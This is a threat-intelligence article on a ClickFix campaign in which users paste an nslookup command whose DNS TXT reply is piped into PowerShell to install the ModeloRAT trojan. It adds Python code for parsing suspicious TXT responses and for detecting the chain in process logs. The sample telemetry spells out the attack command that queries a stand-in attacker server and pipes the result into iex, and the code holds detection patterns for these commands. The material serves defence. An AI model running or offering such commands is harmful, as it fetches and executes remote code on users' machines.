New ClickFix Attack Abuses DNS 'nslookup' for Stealthy Malware Delivery

Microsoft Warns of Novel ClickFix Variant Using DNS Queries to Deploy ModeloRAT Trojan

MEDIUM
February 17, 2026
5m read
Malware, Phishing, Threat Intelligence

Related Entities

Products & Tech

Microsoft Windows

Other

ModeloRAT

Full Report

Executive Summary

Microsoft Threat Intelligence has reported on a novel evolution of the ClickFix social engineering technique. This new campaign tricks users into executing a malicious nslookup command, which leverages the Domain Name System (DNS) as a stealthy delivery mechanism for a PowerShell payload. This method helps attackers evade traditional web-based detection and has been observed deploying ModeloRAT, a Python-based remote access trojan (RAT). The technique highlights threat actors' ongoing innovation in abusing legitimate system tools and fundamental network protocols for malicious purposes.


Threat Overview

The ClickFix technique is a form of social engineering where users are presented with a fake error message or prompt, instructing them to copy and paste a command into the Windows Run dialog or Command Prompt to "fix" a non-existent issue.

This new variant weaponizes the nslookup utility. The attack proceeds as follows:

  1. Social Engineering: A user is lured into running a command like nslookup -query=txt <attacker-controlled-domain>. The command is crafted to look innocuous: nslookup is a built-in diagnostic tool, and the argument looks like an ordinary hostname.
  2. DNS Query: The command makes the victim's machine send a DNS TXT query for the attacker-controlled domain. Because the attacker operates the authoritative name server for that domain, or names that server explicitly as nslookup's server argument, the attacker decides what the answer contains.
  3. Malicious Payload Delivery: The attacker's DNS server answers with the payload. The PowerShell script is embedded in the response, either in the TXT record data or in the name string that nslookup prints in its Name: output field.
  4. Execution: The command the user pasted pipes nslookup's output into Invoke-Expression (| iex), so the script runs in the user's PowerShell session without a file being written to disk.
  5. Staging: The PowerShell script downloads a ZIP archive containing a malicious Python script, which performs system reconnaissance.
  6. Final Payload: The chain ends with a VBScript that establishes persistence and launches ModeloRAT, giving the attacker remote control of the host.
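To make steps 2 through 4 concrete, the following added example (not code from Microsoft's report or from the campaign) builds a DNS response whose TXT record carries a script-like string, parses it the way a resolver does, and applies the two observables this report points at: oversized TXT data and script-interpreter tokens inside it. The domain lookup.example.test, the inert placeholder payload and the 255-byte threshold are assumptions for illustration; the real payload is not reproduced.

```python
"""Build and inspect a DNS TXT response carrying a script-like payload.

Added example, not from the Microsoft report. The domain and payload below are
constructed placeholders so the code runs offline; nothing here executes them.
"""
import re
import struct

ATTACKER_DOMAIN = "lookup.example.test"  # assumption: placeholder attacker domain
# Inert stand-in for the PowerShell stage the report describes. The trailing
# comment padding only makes it longer than one 255-byte TXT chunk.
PLACEHOLDER_PAYLOAD = "iex 'Write-Output stage-two-placeholder' # " + "x" * 300
BENIGN_SPF = "v=spf1 include:_spf.example.test -all"  # a normal TXT answer for contrast

QTYPE_TXT = 16
SCRIPT_TOKENS = re.compile(r"(?<![\w-])(iex|invoke-expression|downloadstring|iwr|-enc\w*)\b", re.I)


def encode_name(name: str) -> bytes:
    """Encode a dotted hostname as DNS labels (length-prefixed, NUL-terminated)."""
    out = b"".join(struct.pack("B", len(l)) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"


def encode_txt_rdata(text: str) -> bytes:
    """TXT RDATA is one or more <character-string>s of at most 255 bytes each;
    longer text is split into consecutive chunks that clients concatenate."""
    raw = text.encode()
    chunks = [raw[i:i + 255] for i in range(0, len(raw), 255)] or [b""]
    return b"".join(struct.pack("B", len(c)) + c for c in chunks)


def build_txt_response(qname: str, text: str, txid: int = 0x1234) -> bytes:
    """Standard response: one TXT question, one TXT answer whose owner name is a
    compression pointer (0xC00C) back to the question name at offset 12."""
    header = struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0)  # QR|RD|RA, NOERROR
    question = encode_name(qname) + struct.pack("!HH", QTYPE_TXT, 1)
    rdata = encode_txt_rdata(text)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_TXT, 1, 60, len(rdata)) + rdata
    return header + question + answer


def read_name(msg: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, jumped, end = [], False, off
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_txt_answers(msg: bytes):
    """Return [(owner_name, txt_text, chunk_count)] for every TXT answer."""
    _, _, qd, an, _, _ = struct.unpack("!6H", msg[:12])
    off = 12
    for _ in range(qd):
        _, off = read_name(msg, off)
        off += 4  # QTYPE + QCLASS
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == QTYPE_TXT:
            parts, p = [], 0
            while p < len(rdata):
                n = rdata[p]
                parts.append(rdata[p + 1:p + 1 + n])
                p += 1 + n
            answers.append((name, b"".join(parts).decode(errors="replace"), len(parts)))
    return answers


def assess_txt_response(msg: bytes, size_threshold: int = 255) -> dict:
    """Heuristic from the observables table: oversized TXT data and
    script-interpreter tokens in TXT data are each a reason to flag."""
    answers = parse_txt_answers(msg)
    total = sum(len(t.encode()) for _, t, _ in answers)
    tokens = sorted({m.lower() for _, t, _ in answers for m in SCRIPT_TOKENS.findall(t)})
    return {
        "answers": answers,
        "txt_bytes": total,
        "chunks": sum(c for _, _, c in answers),
        "script_tokens": tokens,
        "flagged": total > size_threshold or bool(tokens),
    }


if __name__ == "__main__":
    for label, text in (("staged", PLACEHOLDER_PAYLOAD), ("spf", BENIGN_SPF)):
        v = assess_txt_response(build_txt_response(ATTACKER_DOMAIN, text))
        print(label, v["txt_bytes"], "bytes in", v["chunks"], "chunk(s)", v["script_tokens"], v["flagged"])
```

The chunking matters for detection: a single TXT answer can legitimately exceed 255 bytes (long DKIM keys do), so a size threshold alone will produce noise. Combining size with the presence of interpreter tokens, and with the query having gone to a non-corporate resolver, keeps the rule useful.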

Technical Analysis

This attack chain maps to the following ATT&CK techniques:

  • T1204.004 - User Execution: Malicious Copy and Paste: The chain starts only because the user pastes and runs the attacker's command; no software vulnerability is exploited.
  • T1071.004 - Application Layer Protocol: DNS: DNS carries the first-stage script. DNS is rarely content-inspected with the rigor applied to HTTP/S, which is the evasion the technique buys.
  • T1059.001 - Command and Scripting Interpreter: PowerShell: PowerShell executes the script returned over DNS and fetches the next stage.
  • T1059.006 - Command and Scripting Interpreter: Python and T1059.005 - Command and Scripting Interpreter: Visual Basic: The reconnaissance stage is a Python script and the persistence and launcher stage is a VBScript, so both interpreters appear in the chain.
  • T1105 - Ingress Tool Transfer: The PowerShell stage downloads the ZIP archive containing the Python stage from an external source.

Impact Assessment

Successful execution gives the attacker remote control of the host through ModeloRAT. Typical consequences of a RAT of this kind include:

  • Data Theft: Exfiltration of sensitive files, keystrokes, and credentials from the compromised machine.
  • Espionage: Capturing screenshots and monitoring the user's activity.
  • Further Intrusion: Using the compromised machine as a beachhead to move laterally within the victim's network.
  • Botnet Enrollment: Enrolling the system in a botnet for DDoS or other malicious activity.

The use of DNS for payload delivery makes this attack particularly insidious, because security controls focused on inspecting web traffic never see the first stage arrive.

Cyber Observables for Detection

Type                    | Value                      | Description
command_line_pattern    | nslookup -                 | Command-line execution of nslookup with an explicit server argument or an unusual query type such as TXT, especially when its output is piped to another process.
log_source              | Windows Event ID 4688      | Process creation auditing, with the "Include command line in process creation events" policy enabled, to detect nslookup.exe launched with suspicious parameters.
network_traffic_pattern | Large DNS responses        | Unusually large DNS responses, particularly TXT answers, can indicate payload delivery or data exfiltration.
command_line_pattern    | powershell -enc or ` iex`  | PowerShell launched with an encoded command or with Invoke-Expression, especially in the same command line as nslookup.

Detection & Response

  • Command-Line Logging: Enable command-line capture for process creation on all endpoints (Sysmon Event ID 1, Security Event ID 4688 with the "Include command line in process creation events" policy, or EDR telemetry). Alert on nslookup.exe launched with a TXT query type or an explicit server argument, on nslookup spawned by powershell.exe, and on PowerShell command lines that pipe nslookup output into an interpreter (| iex). Reference D3FEND technique D3-PA - Process Analysis.
  • DNS Monitoring: Monitor DNS traffic for anomalies: TXT queries to newly registered or rarely seen domains, a high volume of TXT queries from a single host, queries sent directly to external resolvers rather than the corporate ones, and abnormally large responses. DNS firewalls and resolvers with response inspection are effective here. Reference D3FEND technique D3-NTA - Network Traffic Analysis.
  • PowerShell Logging: Enable PowerShell Script Block Logging (Event ID 4104) and Module Logging so the decoded second-stage script is captured even though it never touches disk.
  • User Training: Since the attack begins with social engineering, training users to be skeptical of any instruction to paste and run a command is a critical preventative measure.
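As an added example of the command-line logging rules above (this is not Microsoft's detection content), the following Python applies a handful of rules to process-creation records. The field names follow Sysmon Event ID 1; the four records, the domains, the name server and the parent/child pairs are constructed samples, not observed indicators.

```python
"""Process-creation detection for the nslookup ClickFix chain.

Added example, not part of the Microsoft report. The records below are
constructed to resemble Sysmon Event ID 1 / Security 4688 fields; domains,
server and parent/child pairs are assumptions, not observed IOCs.
"""
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# nslookup accepts -querytype/-type and their abbreviations (-q, -qt, -ty).
TXT_QUERY = re.compile(r"-(?:q|qt|query|querytype|ty|type)\s*=\s*txt\b", re.I)
# nslookup output piped into something that will execute it.
PIPE_TO_EXEC = re.compile(r"\bnslookup\b[^|]*\|\s*(?:iex|invoke-expression|powershell|pwsh)\b", re.I)
# powershell -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENC_ARG = re.compile(r"-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind -EncodedCommand, or '' if absent or undecodable."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def nslookup_positionals(cmdline: str) -> list:
    """Non-option arguments after the program name. nslookup treats the first as
    the name to resolve and the second as the server to ask, so two of them
    means the query bypasses the host's configured resolver."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    return [t for t in tokens[1:] if not t.startswith("-")]


def evaluate(event: dict) -> list:
    """Rule IDs that fire for one process-creation record."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    if image == "nslookup.exe":
        if TXT_QUERY.search(cmd) and len(nslookup_positionals(cmd)) >= 2:
            hits.append("NSLOOKUP_TXT_TO_EXPLICIT_SERVER")
        if TXT_QUERY.search(cmd) and parent in INTERPRETERS - {"cmd.exe"}:
            hits.append("NSLOOKUP_TXT_FROM_SCRIPT_HOST")
    elif image in INTERPRETERS:
        # Inspect both the literal command line and any -EncodedCommand body.
        text = cmd + "\n" + decode_encoded_command(cmd)
        if PIPE_TO_EXEC.search(text):
            hits.append("NSLOOKUP_PIPED_TO_INTERPRETER")
        if parent == "explorer.exe" and "nslookup" in text.lower():
            hits.append("NSLOOKUP_FROM_RUN_DIALOG")  # explorer.exe parents Win+R launches
    return hits


def triage(events: list) -> dict:
    """Map each RecordId to the rules it triggered (empty list means clean)."""
    return {e["RecordId"]: evaluate(e) for e in events}


# Constructed sample telemetry (not real logs). Record 1 mirrors the reported
# chain: a Run-dialog PowerShell queries TXT from a named server and pipes the
# answer into iex. Record 4 is a routine SPF check that must stay quiet.
ENCODED = base64.b64encode(
    "nslookup -q=txt lookup.example.test ns1.example.test | iex".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"RecordId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "nslookup -q=txt lookup.example.test ns1.example.test | iex"'},
    {"RecordId": 2, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup -q=txt lookup.example.test ns1.example.test"},
    {"RecordId": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -nop -enc {ENCODED}"},
    {"RecordId": 4, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup -type=txt example.test"},
]

if __name__ == "__main__":
    for rid, rules in triage(SAMPLE_EVENTS).items():
        print(rid, rules or "clean")
```

Two design points carry over to a real SIEM rule: decode -EncodedCommand before matching, otherwise record 3 looks like any other encoded launch; and key the nslookup rules on the explicit server argument and the interpreter parent rather than on TXT alone, so an administrator checking an SPF record from a cmd prompt (record 4) does not page anyone.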

Mitigation

  • Application Control: Use application control solutions, like Windows Defender Application Control, to restrict the execution of unauthorized scripts and tools. Reference D3FEND technique D3-EAL - Executable Allowlisting.
  • Attack Surface Reduction (ASR): Enable the Microsoft Defender ASR rules that interrupt this chain, in particular "Block JavaScript or VBScript from launching downloaded executable content" and "Block execution of potentially obfuscated scripts", in audit mode first and then in block mode.
  • DNS Filtering: Use a DNS filtering service to block queries to known malicious domains. This can break the attack chain at the DNS query stage. Reference D3FEND technique D3-DNSDL - DNS Denylisting.
  • User Education: Train users to never copy and paste commands from pop-ups, websites, or emails into a command prompt or Run dialog.

Timeline of Events

February 16, 2026: Microsoft publicly warns about the new ClickFix campaign variant.
February 17, 2026: This article was published.

MITRE ATT&CK Mitigations

User Training (M1017): Training users to identify social engineering and not to run commands from untrusted sources is a key preventative control.

Filter Network Traffic (M1037): DNS filtering or DNS firewall solutions can block the initial query to the attacker's malicious domain.

Execution Prevention (M1038): Using application control to restrict PowerShell execution, or enabling Constrained Language Mode, can prevent the payload from running.

Audit (M1047): Enabling and auditing detailed process and PowerShell logs is essential for detecting and investigating this type of fileless attack.

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

ClickFix, DNS tunneling, social engineering, ModeloRAT, PowerShell, fileless malware
